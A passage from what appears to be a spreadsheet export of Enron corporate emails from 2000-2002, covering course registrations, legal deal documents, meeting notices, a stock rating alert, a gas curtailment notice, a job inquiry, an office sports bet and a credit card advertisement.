A few issues._x000D_
_x000D_
1. I would like to register 2 members of my group for both courses (in _x000D_
Houston):_x000D_
_x000D_
a. Paulo Issler_x000D_
b. Alex Huang_x000D_
_x000D_
I shall attend the course on weather only.  _x000D_
_x000D_
2. I have started the process to issue a check for 5,000 AUD for Lacima._x000D_
Shirley sent you an update on this. The 2nd installment comes from the budget _x000D_
of our _x000D_
office in Australia. I shall talk to Paul Quilkey today about it. Please, let _x000D_
me know if there is any delay._x000D_
_x000D_
3. The book  will be used as textbook for the class I shall be teaching at _x000D_
Rice._x000D_
Rice Univ bookshop is placing an order._x000D_
_x000D_
4. I would like to order 50 copies for my group. What is the ebst_x000D_
way to place the order?  Can we pay in US dollars?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Julie" &lt;julie@lacima.co.uk&gt; on 11/12/2000 02:05:40 PM_x000D_
To: &lt;Undisclosed-Recipient:@mailman.enron.com;&gt;_x000D_
cc:  _x000D_
Subject: Lacima Energy and Weather Derivatives Courses by Clewlow and _x000D_
Strickland_x000D_
_x000D_
_x000D_
_x000D_
Please find attached information?for our next two courses and  workshops:? _x000D_
Energy Derivatives:? Pricing and Risk Management and_x000D_
Weather Derivatives, which will be conducted in Houston and in London in  Feb _x000D_
/ March 2001.? Instructors will be Dr Les Clewlow and Dr Chris  Strickland._x000D_
?_x000D_
Because the course requires intense interaction, the courses will  be?limited _x000D_
to a maximum of 15 people, so early registration is  encouraged._x000D_
?_x000D_
If you require further information, or would like to register for either or  _x000D_
both?courses, please contact me via this email or our web site,?www._x000D_
lacimagroup.com_x000D_
 - Energy.pdf_x000D_
 - weather.pdf_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 07:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ozzie.pagan@enron.com', 'jeffery.ader@enron.com', 'heather.kroll@enron.com', 'scott.healy@enron.com'})</t>
  </si>
  <si>
    <t>Entity to enter into PDA with CRRA</t>
  </si>
  <si>
    <t>Has anyone given any thought to the creation of a new company to enter into _x000D_
the CRRA/Fuel Cell purchase/sale transactions?  Any names to suggest?  If _x000D_
Enron is going to be the contractor as contemplated by the PDA, I would _x000D_
expect to use a limited liablity company and not ENA.  _x000D_
_x000D_
Please advise._x000D_
_x000D_
Kay</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 22:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'rick@osubeavers.com'})</t>
  </si>
  <si>
    <t>Re: Drinking Green Beer</t>
  </si>
  <si>
    <t>Rick, what are you doing for tommorow.  I would love to go out early before _x000D_
it gets to crowded and then maybe go somewhere a little more mellow later in _x000D_
the afternoon/evening.  Also, are you guys doing anything this evening? Let _x000D_
me know.</t>
  </si>
  <si>
    <t>Wed, 13 Dec 2000 08:47:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'webmaster@earnings.com'})</t>
  </si>
  <si>
    <t>frozenset({'pallen@enron.com'})</t>
  </si>
  <si>
    <t>FS Van Kasper Initiates Coverage of NT</t>
  </si>
  <si>
    <t xml:space="preserve">If you cannot read this email, please click here. _x000D_
_x000D_
Earnings.com - NT Upgrade/Downgrade HistoryA:visited { color:000066; _x000D_
}A:hover{ color:cc6600; }_x000D_
Earnings.com			[IMAGE]?_x000D_
    December 13, 2000     4:46 PM ET			HomeAbout UsMy AccountHelpContact UsLogin_x000D_
[IMAGE]			yelblue_pixel.gif (43 bytes)_x000D_
			_x000D_
			_x000D_
			?_x000D_
			[IMAGE]_x000D_
			?_x000D_
			Calendar_x000D_
			Portfolio_x000D_
			Market_x000D_
			_x000D_
_x000D_
_x000D_
_x000D_
[IMAGE]_x000D_
 [IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
[IMAGE]_x000D_
	?	_x000D_
		_x000D_
		Symbol(s):_x000D_
		?_x000D_
		 [IMAGE]?Add NT to my portfolio_x000D_
		[IMAGE]?Symbol lookup_x000D_
		[IMAGE]?Email this page to a friend?Email This Page To A Friend_x000D_
		Market Summary_x000D_
		_x000D_
		_x000D_
		[IMAGE]?View Today's Upgrades/Downgrades/Coverage Initiated_x000D_
		Briefing_x000D_
		 Analyst History - Nortel Networks Corporation (NT)  _x000D_
		_x000D_
		 _x000D_
		   Date    _x000D_
		  Brokerage Firm   _x000D_
		  Action   _x000D_
		  Details   _x000D_
		  12/13/2000   _x000D_
		  FS Van Kasper   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  11/21/2000   _x000D_
		  Lazard Freres &amp; Co.   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  11/06/2000   _x000D_
		  Unterberg Towbin   _x000D_
		     Downgraded         _x000D_
		     to Buy _x000D_
		from Strong Buy         _x000D_
		_x000D_
		  11/02/2000   _x000D_
		  S G Cowen   _x000D_
		     Downgraded         _x000D_
		     to Buy _x000D_
		from Strong Buy         _x000D_
		_x000D_
		  10/25/2000   _x000D_
		  Gerard Klauer Mattison   _x000D_
		     Upgraded         _x000D_
		     to Buy _x000D_
		from Outperform         _x000D_
		_x000D_
		  10/25/2000   _x000D_
		  Lehman Brothers   _x000D_
		     Downgraded         _x000D_
		     to Outperform _x000D_
		from Buy         _x000D_
		_x000D_
		  10/25/2000   _x000D_
		  Chase H&amp;Q   _x000D_
		     Downgraded         _x000D_
		     to Buy _x000D_
		from Strong Buy         _x000D_
		_x000D_
		  10/04/2000   _x000D_
		  Sands Brothers   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  10/03/2000   _x000D_
		  ING Barings   _x000D_
		     Coverage Initiated         _x000D_
		     at Strong Buy         _x000D_
		_x000D_
		  09/28/2000   _x000D_
		  Sanford Bernstein   _x000D_
		     Downgraded         _x000D_
		     to Mkt Perform _x000D_
		from Outperform         _x000D_
		_x000D_
		  09/26/2000   _x000D_
		  Josephthal and Co.   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  08/08/2000   _x000D_
		  DLJ   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  07/28/2000   _x000D_
		  A.G. Edwards   _x000D_
		     Upgraded         _x000D_
		     to Accumulate _x000D_
		from Maintain Position         _x000D_
		_x000D_
		  07/27/2000   _x000D_
		  ABN AMRO   _x000D_
		     Upgraded         _x000D_
		     to Top Pick _x000D_
		from Buy         _x000D_
		_x000D_
		  06/15/2000   _x000D_
		  Bear Stearns   _x000D_
		     Coverage Initiated         _x000D_
		     at Attractive         _x000D_
		_x000D_
		  05/25/2000   _x000D_
		  Chase H&amp;Q   _x000D_
		     Upgraded         _x000D_
		     to Strong Buy _x000D_
		from Buy         _x000D_
		_x000D_
		  04/28/2000   _x000D_
		  First Union Capital   _x000D_
		     Coverage Initiated         _x000D_
		     at Strong Buy         _x000D_
		_x000D_
		  04/03/2000   _x000D_
		  Dresdner Kleinwort Benson   _x000D_
		     Coverage Initiated         _x000D_
		     at Buy         _x000D_
		_x000D_
		  03/21/2000   _x000D_
		  Wasserstein Perella   _x000D_
		     Coverage Initiated         _x000D_
		     at Hold         _x000D_
		_x000D_
		  03/15/2000   _x000D_
		  Chase H&amp;Q   _x000D_
		     Upgraded         _x000D_
		     to Buy _x000D_
		from Market Perform         _x000D_
		_x000D_
		_x000D_
		_x000D_
		_x000D_
		 Briefing.com is the leading Internet provider of live market analysis for _x000D_
U.S. Stock, U.S. Bond and world FX market participants. _x000D_
		_x000D_
		, 1999-2000 Earnings.com, Inc., All rights reserved_x000D_
		about us | contact us | webmaster |site map_x000D_
		privacy policy |terms of service_x000D_
_x000D_
_x000D_
Click Here if you would like to change your email alert settings._x000D_
</t>
  </si>
  <si>
    <t>conference room eb3127</t>
  </si>
  <si>
    <t>CALENDAR ENTRY:	APPOINTMENT_x000D_
_x000D_
Description:_x000D_
	conference room eb3127_x000D_
_x000D_
Date:		11/2/2000_x000D_
Time:		1:30 PM - 3:00 PM (Central Standard Time)_x000D_
_x000D_
Chairperson:	Outlook Migration Team_x000D_
_x000D_
Detailed Description:</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 08:06:56 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: Bet</t>
  </si>
  <si>
    <t>you may need to hire me as a collection agent.  i think i have a steel pipe under my desk._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bass, Eric  _x000D_
Sent:	Tuesday, November 27, 2001 9:37 AM_x000D_
To:	Blanchard, Timothy_x000D_
Subject:	FW: Bet_x000D_
_x000D_
surprising . . ._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Bass, Eric  _x000D_
Sent:	Tuesday, November 27, 2001 9:36 AM_x000D_
To:	Hatten, Micah_x000D_
Subject:	RE: Bet_x000D_
_x000D_
that sounds good 9 it is.  we will go for beers regardless_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hatten, Micah  _x000D_
Sent:	Tuesday, November 27, 2001 9:28 AM_x000D_
To:	Bass, Eric_x000D_
Subject:	RE: Bet_x000D_
_x000D_
Alright,  I'll take the bet.  I'll have to scrounge around to find 40 buck though!  You know you're stealing money from my severance!  I may need that to eat on by the end of the week.  If you say the line is 9, that works for me.  CU is on a role....it's time for Simms to go down!_x000D_
_x000D_
If you steal my money, you'll have to buy me a beer._x000D_
 -----Original Message-----_x000D_
From: 	Bass, Eric  _x000D_
Sent:	Tuesday, November 27, 2001 9:24 AM_x000D_
To:	Hatten, Micah_x000D_
Subject:	Bet_x000D_
_x000D_
Since you never gave me the $20 for the last time we bet on CU/Texas, I figured I would give you the chance to go double or nothing on the second round.  I think the line is Texas -9.  Let me know.</t>
  </si>
  <si>
    <t>frozenset({'agustin.perez@enron.com'})</t>
  </si>
  <si>
    <t>Vitro's annuity</t>
  </si>
  <si>
    <t>Errol,_x000D_
_x000D_
Do you have any news on the $579,708.72 payment for Vitro Corporativo? _x000D_
The customer is asking about this payment. Please let me know._x000D_
_x000D_
Agustin Perez</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 06:13:27 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alma.carrillo@enron.com', 'teb.lokey@enron.com'})</t>
  </si>
  <si>
    <t>FW: TW Order report formats and data capture Mtg</t>
  </si>
  <si>
    <t>Teb,_x000D_
Please advise if you will be able to attend this meeting._x000D_
Alma_x000D_
36503_x000D_
_x000D_
 -----Original Appointment-----_x000D_
From: 	Carrillo, Alma  _x000D_
Sent:	Tuesday, July 31, 2001 3:09 PM_x000D_
To:	Holmes, Bradley; Kowalke, Terry; Powell, Don; January, Steven; Blair, Lynn; Betancourt, Ramona ; Brown, Elizabeth; Medeles, Gerry; Schoolcraft, Darrell; Bianchi, Rita; Corman, Shelley_x000D_
Subject:	TW Order report formats and data capture Mtg_x000D_
When:	Tuesday, August 07, 2001 10:00 AM-11:00 AM (GMT-06:00) Central Time (US &amp; Canada)._x000D_
Where:	Hou 4102 / Oma 696_x000D_
_x000D_
Alma for Brad</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 10:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Alert Posted: 6:10 PM December 5, 2000: CGC Interruptible notice_x000D_
 for Wed., 12/06/00 at 10 AM.</t>
  </si>
  <si>
    <t xml:space="preserve">Alert Posted: 6:10 PM December 5, 2000: CGC Interruptible notice for Wed., _x000D_
12/06/00 at 10 AM._x000D_
ATTENTION CGC INTERRUPTIBLE CUSTOMERS AND THEIR SHIPPERS:_x000D_
Effective at 10 AM, Wednesday, December 6, 2000 and until further notice, _x000D_
Chattanooga Gas Company (CGC) is issuing a curtailment order for all _x000D_
interruptible customers. The interruptible customers are limited to their _x000D_
scheduled gas from the interstate pipelines plus any firm contract amounts _x000D_
with CGC. No other CGC gas is available for interruptible sales at this time _x000D_
(sometimes these interruptible sales have been refered to as incremental or _x000D_
emergency gas)._x000D_
</t>
  </si>
  <si>
    <t>Tue, 24 Oct 2000 07:55:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: WestLB</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 10/24/2000 02:55 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Cheryl Costa@ENRON_DEVELOPMENT_x000D_
10/24/2000 02:44 PM_x000D_
To: Kay Mann/Corp/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: Re: WestLB  _x000D_
_x000D_
Good Afternoon Kay,_x000D_
_x000D_
The Mitsubishi equipment was purchased through WestLB.  Additionally I am _x000D_
working on the Las Vegas Cogen Project with a WestLB structure.  I am _x000D_
purchasing a steam turbine and four HRSG's.  _x000D_
_x000D_
Give me a call at your convenience and I will give you any particulars _x000D_
required._x000D_
_x000D_
Regards,_x000D_
_x000D_
Cheryl Costa_x000D_
_x000D_
_x000D_
To: Kathleen Clark/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Barton _x000D_
Clark/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Stuart Zisman/HOU/ECT@ECT, Scott _x000D_
Dieball/ENRON_DEVELOPMENT@ENRON_DEVELOPMENt, David K _x000D_
Bargainer/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Brian D _x000D_
Barto/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Cheryl _x000D_
Costa/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Peggy Banczak/HOU/ECT@ECT, Karen E _x000D_
Jones/HOU/ECT@ECT, Dale Rasmussen/HOU/ECT@ECT, Alan Larsen/PDX/ECT@ECT, _x000D_
davidlu@nepco.com_x000D_
cc: Sheila Tweed/HOU/ECT@ECT, Roseann Engeldorf/Corp/Enron@ENRON _x000D_
_x000D_
Subject: WestLB_x000D_
_x000D_
To all,_x000D_
_x000D_
As you know, Enron is refinancing the equipment we bought through WestLB.  _x000D_
I've been asked to compile a list of all the equipment purchased through _x000D_
WestLB, and the change orders related to same.  All I know about is the LM _x000D_
deal with GE (with 1 executed change order, approximately 4 or 5 pending) and _x000D_
the ABB transformer deal (with one CO pending).  Please let me know if you _x000D_
are aware of any others._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 18 Oct 2001 09:05:16 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pincussr@nmenergy.com'})</t>
  </si>
  <si>
    <t>RE: Career Opportunities at Enron</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
Dear Mr. Derrick:_x000D_
_x000D_
     Thank you very much for you prompt reply to my inquiry. I hope the hear_x000D_
from Mr. Headicke and/or Ms. Sharp in the near future. I will be sure to send_x000D_
your regards to Les LoBaugh._x000D_
_x000D_
               Very truly yours,_x000D_
               Steve Pincus_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
James.Derrick@enron.com on 10/18/2001 11:53:44 AM_x000D_
_x000D_
To:   Steven R Pincus/EM/NMEnergy@NMEnergy_x000D_
cc:_x000D_
_x000D_
Subject:  RE: Career Opportunities at Enron_x000D_
_x000D_
_x000D_
_x000D_
Dear Mr. Pincus:_x000D_
_x000D_
     Thank you for your message and for sending your resume to me.  I have_x000D_
forwarded your information to Mr. Mark Haedicke, General Counsel of our_x000D_
Wholesale Group, and to Ms. Vicki Sharp, General Counsel of our Retail_x000D_
Group, for consideration in connection with any opportunities that may_x000D_
exist or come up._x000D_
_x000D_
     Please give my best to Les._x000D_
_x000D_
     Sincerely,_x000D_
_x000D_
     Jim Derrick_x000D_
_x000D_
_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   pincussr@nmenergy.com@ENRON_x000D_
   Sent:   Wednesday, October 17, 2001 2:04 PM_x000D_
   To:     jderric@enron.com_x000D_
   Subject:  Career Opportunities at Enron_x000D_
_x000D_
_x000D_
_x000D_
   Dear Mr. Derrick:_x000D_
_x000D_
        Les LoBaugh suggested that I contact you to inquire about an_x000D_
   in-house_x000D_
   counsel position at Enron. I am the General Counsel of Niagara Mohawk_x000D_
   Holding's_x000D_
   unregulated subsidiaries, Niagara Mohawk Energy, Inc. and Niagara Mohawk_x000D_
   Energy_x000D_
   Marketing, Inc. We expect the sale of Niagara Mohawk Energy Marketing to_x000D_
   close_x000D_
   in November or December of this year, pending FERC approval, and a sale_x000D_
   of_x000D_
   Niagara Mohawk Energy's Distributed Power and Energy Services Business_x000D_
   units may_x000D_
   occur contemporaneously with that closing. Therefore, I am now pursuing_x000D_
   other_x000D_
   career opportunities._x000D_
_x000D_
        I am a good candidate for an in-house counsel position at Enron_x000D_
   because of_x000D_
   my 12 years experience as an attorney in the energy industry. As General_x000D_
   Counsel_x000D_
   for the Company, I provide legal services and business advise to senior_x000D_
   management and the Board of Directors of both the energy marketing and_x000D_
   the_x000D_
   energy services subsidiaries. My experience includes drafting and_x000D_
   negotiating_x000D_
   gas and electric retail sales agreements and master agreements and_x000D_
   related_x000D_
   documents for wholesale energy trading and marketing transactions,_x000D_
   including_x000D_
   physical transactions and financial instruments such as swaps. I monitor_x000D_
   and I_x000D_
   am responsible for representing my company in FERC and state regulatory_x000D_
   proceedings. I keep up to date on the fast moving events and trends in_x000D_
   the_x000D_
   energy marketing and trading industry by closely monitoring regulatory_x000D_
   proceedings, reading information that is published in trade and related_x000D_
   energy_x000D_
   industry publications and my involvement with the National Energy_x000D_
   Marketers_x000D_
   Association and the Federal Energy Bar Association. I am also_x000D_
   responsible for_x000D_
   representing the company and managing outside counsel in litigation and_x000D_
   alternative dispute resolution proceedings. My experience includes_x000D_
   utility_x000D_
   regulatory and legal matters, the transactional work associated with_x000D_
   corporate_x000D_
   mergers and acquisitions, corporate governance, human resource/employee_x000D_
   issues,_x000D_
   interconnection agreements, municipal law, leasing, financing and_x000D_
   secured_x000D_
   transaction agreements, commercial contracts, condemnation litigation_x000D_
   and real_x000D_
   property matters._x000D_
_x000D_
        I have attached my resume for your review. Please contact me at_x000D_
   your_x000D_
   earliest convenience to schedule an interview. I look forward to hearing_x000D_
   from_x000D_
   you soon._x000D_
_x000D_
        Thank you for your consideration._x000D_
_x000D_
                            Very truly yours,_x000D_
                            Steven R. Pincus_x000D_
_x000D_
                  (See attached file: Pincus Resume.doc)_x000D_
_x000D_
    - Pincus Resume.doc &lt;&lt; File: Pincus Resume.doc &gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
This e-mail is the property of Enron Corp. and/or its relevant affiliate and may_x000D_
contain confidential and privileged material for the sole use of the intended_x000D_
recipient (s). Any review, use, distribution or disclosure by others is strictly_x000D_
prohibited. If you are not the intended recipient (or authorized to receive for_x000D_
the recipient), please contact the sender or reply to Enron Corp. at_x000D_
enron.messaging.administration@enron.com and delete all copies of the message._x000D_
This e-mail (and any attachments hereto) are not intended to be an offer (or an_x000D_
acceptance) and do not create or evidence a binding and enforceable contract_x000D_
between Enron Corp. (or any of its affiliates) and the intended recipient or any_x000D_
other party, and may not be relied on by anyone as the basis of a contract by_x000D_
estoppel or otherwise. Thank you._x000D_
**********************************************************************_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 29 Aug 2000 04:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Enron/McGarret C Transaction</t>
  </si>
  <si>
    <t xml:space="preserve">----- Forwarded by Sara Shackleton/HOU/ECT on 08/29/2000 11:36 AM -----_x000D_
_x000D_
	Carol St Clair_x000D_
	08/29/2000 08:13 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT, Mary Cook/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Enron/McGarret C Transaction_x000D_
_x000D_
Carol St. Clair_x000D_
EB 3892_x000D_
713-853-3989 (Phone)_x000D_
713-646-3393 (Fax)_x000D_
carol.st.clair@enron.com_x000D_
----- Forwarded by Carol St Clair/HOU/ECT on 08/29/00 08:10 AM -----_x000D_
_x000D_
	"CHRIS KRECEK" &lt;KRECC@andrews-kurth.com&gt;_x000D_
	08/28/00 12:53 PM_x000D_
		 _x000D_
		 To: &lt;alan.quaintance@enron.com&gt;, &lt;brenda.l.funk@enron.com&gt;, _x000D_
&lt;Carol.St.Clair@enron.com&gt;, &lt;charles.delacey@enron.com&gt;, _x000D_
&lt;Clement.abrams@enron.com&gt;, &lt;David.roland@enron.com&gt;, _x000D_
&lt;Gina.Karathanos@enron.com&gt;, &lt;Joel.ephross@enron.com&gt;, _x000D_
&lt;tina.livingston@enron.com&gt;, &lt;Trevor.Randolph@enron.com&gt;, _x000D_
&lt;trushar.patel@enron.com&gt;, &lt;mniebruegge@mayerbrown.com&gt;, _x000D_
&lt;tellwood@mayerbrown.com&gt;, &lt;eawilburn@prickett.com&gt;, &lt;Tamullen@prickett.com&gt;, _x000D_
&lt;kenton@rlf.com&gt;, &lt;mark.wolf@us.cibc.com&gt;, &lt;mercedes.arango@us.cibc.com&gt;, _x000D_
&lt;schottla@us.cibc.com&gt;, &lt;aroberts@wilmingtontrust.com&gt;_x000D_
		 cc: "David Barbour" &lt;BARBD@andrews-kurth.com&gt;, "MURIEL McFARLING" _x000D_
&lt;MCFAM@andrews-kurth.com&gt;, "Michael Thimmig" &lt;THIMM@andrews-kurth.com&gt;_x000D_
		 Subject: Enron/McGarret C Transaction_x000D_
_x000D_
_x000D_
Attached in WordPerfect format are each of the following documents marked _x000D_
against the version previously circulated:_x000D_
_x000D_
Drawdown Request (254322);_x000D_
Put Option Agreement (254334);_x000D_
Warrant Assignment (254351);_x000D_
Amended and Restated LLC Agreement for McGarret III (254352);_x000D_
Receipt of Asset LLC (254362);_x000D_
Independent Auctioneer Letter Agreement (254369);_x000D_
Direction Letter (254376);_x000D_
Sale and Auction Agreement (254372); and_x000D_
General Opinion of A&amp;K (254385)._x000D_
_x000D_
If you have any questions or comments, please call Muriel McFarling at (214) _x000D_
659-4461.  Thank you._x000D_
_x000D_
Chris Krecek, Secretary/Legal Assistant_x000D_
Andrews &amp; Kurth L.L.P._x000D_
1717 Main Street, Suite 3700_x000D_
Dallas, Texas 75201_x000D_
Phone: (214) 659-4481_x000D_
Fax: (214) 659-4401_x000D_
Email: ckrecek@andrews-kurth.com_x000D_
_x000D_
CONFIDENTIALITY NOTICE:  The information in this e-mail (including any _x000D_
attachments) is confidential, legally privileged and intended only for the _x000D_
use of each recipient named above.  If you are not an intended recipient, you _x000D_
must not read, use or disseminate this information.  If you have received _x000D_
this e-mail in error, please notify the sender immediately by reply e-mail _x000D_
and delete this e-mail from your computer._x000D_
VIRUS WARNING:  Although this e-mail (including any attachments) is not _x000D_
intended to contain any virus or defect that may affect your computer, you _x000D_
are responsible for ensuring that no virus or defect exists.  The sender _x000D_
disclaims any responsibility for any loss or damages arising from any virus _x000D_
or defect associated with this e-mail._x000D_
_x000D_
_x000D_
_x000D_
 - 254385.wpd_x000D_
 - 254334.wpd_x000D_
 - 254351.wpd_x000D_
 - 254352.wpd_x000D_
 - 254362.wpd_x000D_
 - 254369.wpd_x000D_
 - 254372.wpd_x000D_
 - 254376.wpd_x000D_
 - 254322.wpd_x000D_
</t>
  </si>
  <si>
    <t>Thu, 11 Jan 2001 08:41:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: LOI for Prebon</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the proposed form of LOI for Prebon.  Is Prebon Energy the full _x000D_
legal name of the company?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	Bob Shults_x000D_
	01/10/2001 02:25 PM_x000D_
		 _x000D_
		 To: Tana Jones/HOU/ECT@ECT_x000D_
		 cc: Michael.bridges@enron.com_x000D_
		 Subject: LOI for Prebon_x000D_
_x000D_
Tana please draft a Broker Client Letter of Interest for Prebon Energy_x000D_
_x000D_
Terms include_x000D_
_x000D_
Products and Fee_x000D_
_x000D_
North American Gas and Power  $250,000_x000D_
UK and Worldwide Gas and Power $200,000_x000D_
_x000D_
Term One Year_x000D_
_x000D_
_x000D_
_x000D_
Please have Mike Bridges review prior to emailing to:_x000D_
_x000D_
Lee C. Taylor_x000D_
101 Hudson Street_x000D_
Jersey City, New Jersey  07302-3908_x000D_
_x000D_
201 557 5829/5208_x000D_
fax 201 557 5962_x000D_
lctaylor@prebon.com_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 06:52:51 -0800 (PST)</t>
  </si>
  <si>
    <t>curve files</t>
  </si>
  <si>
    <t xml:space="preserve">There is a new directory for the curve files.  I am trying to request access to this for the traders so they can't see the rest of our files._x000D_
_x000D_
This should be done soon._x000D_
_x000D_
Can you move your files to this drive today?_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 18:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'demetrion.ware@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
---------------------- Forwarded by Jason Williams/HOU/ECT on 03/22/2001 03:16 PM ---------------------------_x000D_
_x000D_
_x000D_
g.campbell@pecorp.com on 03/06/2001 10:49:41 AM_x000D_
To:	Jason.Williams@enron.com_x000D_
cc:	 _x000D_
Subject:	_x000D_
_x000D_
_x000D_
 - GC010305.xls _x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 01:21:00 -0800 (PST)</t>
  </si>
  <si>
    <t>SONGS</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Mike Grigsby/HOU/ECT on 02/15/2001 09:20 _x000D_
AM ---------------------------_x000D_
To: mike.grigsby@enron.com_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
To:_x000D_
cc:_x000D_
_x000D_
Subject:_x000D_
_x000D_
Site is on temporary string lighting, Aux Boiler, with Diesels running._x000D_
Investigation into trubine bearing damage and possible Unit Auxiliary_x000D_
Transformer problems._x000D_
_x000D_
V.P. Russ Krieger came over the PA to say "Yahoo San Onofre!" for a job_x000D_
well done in getting the outage done in 32 days (breaker to breaker, so to_x000D_
speak). He went on to say that it is not known if the fault was related to_x000D_
outage work, or if there will be an effect on our outage bonus. He said_x000D_
we'll be of line for several weeks. I'd say at least that since our turbine_x000D_
ground to a halt with no DC lube oil, and is still cooling with no jacking._x000D_
_x000D_
(See attached file: MVC-038f.jpg)_x000D_
(See attached file: MVC-015f.jpg)_x000D_
(See attached file: MVC-016f.jpg)_x000D_
(See attached file: MVC-020f.jpg)_x000D_
(See attached file: MVC-021f.jpg)_x000D_
(See attached file: MVC-023f.jpg)_x000D_
(See attached file: MVC-028f.jpg)_x000D_
(See attached file: MVC-029f.jpg)_x000D_
(See attached file: MVC-030f.jpg)_x000D_
(See attached file: MVC-031f.jpg)_x000D_
(See attached file: MVC-033f.jpg)_x000D_
(See attached file: MVC-034f.jpg)_x000D_
(See attached file: MVC-035f.jpg)_x000D_
(See attached file: MVC-011f.jpg)_x000D_
_x000D_
_x000D_
 - MVC-038f.jpg_x000D_
 - MVC-015f.jpg_x000D_
 - MVC-016f.jpg_x000D_
 - MVC-020f.jpg_x000D_
 - MVC-021f.jpg_x000D_
 - MVC-023f.jpg_x000D_
 - MVC-028f.jpg_x000D_
 - MVC-029f.jpg_x000D_
 - MVC-030f.jpg_x000D_
 - MVC-031f.jpg_x000D_
 - MVC-033f.jpg_x000D_
 - MVC-034f.jpg_x000D_
 - MVC-035f.jpg_x000D_
 - MVC-011f.jpg_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 02:52:00 -0800 (PST)</t>
  </si>
  <si>
    <t>"Enovate" - 50/50 joint venture between ENA sub and Peoples Energy_x000D_
 Corp. sub</t>
  </si>
  <si>
    <t>Mark:_x000D_
_x000D_
Credit has asked us to pursue trading arrangements on behalf of Enovate.  _x000D_
_x000D_
At least for the short term, Mark Haedicke told Kay Mann that ENA legal _x000D_
should handle Enovate legal work.  That work currently consists of _x000D_
establishing documentation for financial trading with third parties.  It is _x000D_
not clear what lawyers (ENA or Peoples) will draft/negotiate ISDA masters nor _x000D_
have any forms been agreed (but Peoples' lawyers have seen our forms and I _x000D_
have seen their forms which are poorly drafted).  Bill Bradford will have the _x000D_
final word on Enovate credit._x000D_
_x000D_
Credit has asked us to track Enovate masters on our Lotus Notes database._x000D_
_x000D_
Do you need to follow up with Mark about us negotiating Enovate's master _x000D_
agreements?  Or should we just handle as any other project?_x000D_
_x000D_
Sara</t>
  </si>
  <si>
    <t>Tue, 5 Dec 2000 14:56:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'members@thestreet.com'})</t>
  </si>
  <si>
    <t>Pre-selected NextCard Visa! As low as 0.0% Intro APR!</t>
  </si>
  <si>
    <t>Congratulations!  As a reader of TheStreet.com, you've been_x000D_
pre-selected for this special NextCardc Visac offer with rates as_x000D_
low as 0.0% Intro or 9.99% Ongoing APR!_x000D_
_x000D_
NextCardc Visac is the best credit card you'll find, period. We're the_x000D_
only credit card company that will tailor an offer specifically for you_x000D_
with APRs as low as 0.0% Intro and 9.99% Ongoing.  Then, you can_x000D_
transfer balances with one click and start saving money right NOW._x000D_
_x000D_
Get a NextCard Visa, in 30 seconds! Getting a credit card has never been so _x000D_
easy._x000D_
_x000D_
1.  Fill in the brief application_x000D_
2.  Receive approval decision within 30 seconds_x000D_
3.  Get rates as low as 0.0% Intro or 9.99% Ongoing APR and no annual fee!_x000D_
_x000D_
Click here to apply!_x000D_
http://www.nextcard.com/thestreet/03.html_x000D_
_x000D_
